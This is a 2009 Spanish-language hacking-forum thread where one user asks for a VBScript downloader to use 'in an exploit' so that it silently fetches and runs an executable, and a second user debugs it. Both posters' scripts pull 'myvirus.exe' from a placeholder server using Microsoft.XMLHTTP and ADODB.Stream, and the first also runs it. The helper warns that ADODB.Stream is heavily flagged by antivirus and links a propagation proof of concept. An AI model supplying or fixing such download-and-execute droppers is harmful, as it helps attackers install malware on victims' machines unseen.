Downloader en VBScript, ayuda.

akrana · 17 Julio 2009, 02:48 AM

Hola, estoy tratando de encontrar el codigo fuente de un downloader en VBScript para utilizarlo en un exploit, de momento tengo esto, pero me salta un error...

Código [Seleccionar]


Sub Main()

On Error Resume Next
Set wsl = CreateObject("WScript.Shell")

bd = DowloadFile("http://www.myserver.com/myvirus.exe","c:\v.exe")

If bd = True Then wsl.run "c:\v.exe"
End Sub

Function DowloadFile(Url,Path)

On Error Resume Next: Err.Clear

Set xml = CreateObject("Microsoft.XMLHTTP")
Set ads = CreateObject("ADODB.Stream")

xml.Open "GET", Url, False
xml.Send

ads.Mode = 3

ads.Type = 1

ads.Open

ads.Write(xml.ResponseBody)

ads.SaveToFile(Path,2)

If Err Then DownloadFile = False Else DowloadFile = True
End Function

Necesito descargar y ejecutar un exe silenciosamente por medio de VBScript, pero este codigo no funciona...Si alguien lo puede revisar y decirme como lo puedo hacer se lo agradeceria.
No es totalmente indispensable que sea en VBScript, tambien puede ser en BATCH o por medio de una shellcode, pero no me aclaro...

Un saludo, gracias.

Novlucker · 17 Julio 2009, 03:16 AM

Quitale el Sub Main() y End Sub, línea 1 y 9 respectivamente

, pero de cualquier manera debo de advertirte que
ADODB.Stream es MUY detectado por los AV

Saludos

akrana · 17 Julio 2009, 03:39 AM

Me sigue saltando error: No se pueden utilizar parentesis al llamar a Sub. Cual puede ser el fallo?
Estoy buscando algun otro metodo sencillo pero no encuentro nada...No se como hacerlo, porque en batch?

Un saludo y muchas gracias!!

Novlucker · 17 Julio 2009, 04:08 AM

Ya he visto el problema .. intentalo así que es más sencillo (mismo método)

Código (vb) [Seleccionar]

Set objxmlhttp = CreateObject("Microsoft.XMLHTTP")
objxmlhttp.Open "GET","http://www.myserver.com/myvirus.exe",0
objxmlhttp.Send()
Do until objxmlhttp.readystate = 4
 wscript.sleep 200
Loop
Folder = replace(Wscript.scriptfullname,Wscript.scriptname,"")
Set objADO = CreateObject("ADODB.Stream")
objADO.Mode = 3
objADO.Type = 1
objADO.Open()
objADO.Write(objxmlhttp.responseBody)
objADO.SaveToFile Folder & "\calc.exe",2

Saludos

akrana · 17 Julio 2009, 04:23 AM

Lo acabo de probar y no tira ningun error pero el archivo no aparece por ninguna parte...Lo estoy probando con la calculadora de windows para mas info...
No encuentro el fallo, se podria hacer de alguna otra manera?

Un saludo y muchas gracias!

Novlucker · 17 Julio 2009, 04:37 AM

Pero la calculadora la has subido a algún servidor? Revisa en C:

Sino intenta de nuevo .. he modificado el code para que espere a que el archivo se haya bajado completamente, y que la calculadora aparezca en la misma ruta que el script

Saludos

akrana · 17 Julio 2009, 04:40 AM

La calculadora esta subida a un server y he revisaco C: y no aparece por ninguna parte...nose cual puede ser el problema, pruebo este nuevo y te digo, de todas formas muchas gracias por la ayuda...

Un saludo

Novlucker · 17 Julio 2009, 04:49 AM

Muy bien, y como veo que es lo que intentas hacer ....

http://foro.elhacker.net/scripting/htmlvbsbatch_propagacion_a_traves_de_internet_posible-t221250.0.html
Incluso hay un POC en uno de los mensajes que he dejado en ese tema

Saludos

akrana · 17 Julio 2009, 04:57 AM

No funciono...

Bueno, voy a leer esto aver si soy capaz de echar la calculadora a andar...

Un saludo y muchisimas gracias por la ayuda!!!

Novlucker · 17 Julio 2009, 05:04 AM

La verdad ya no se ... los scripts estan bien ... solo aclarar que los que he dejado solo bajan, no ejecutan nada .. y por otra parte ,... has cambiado bien la URL en el script

Saludos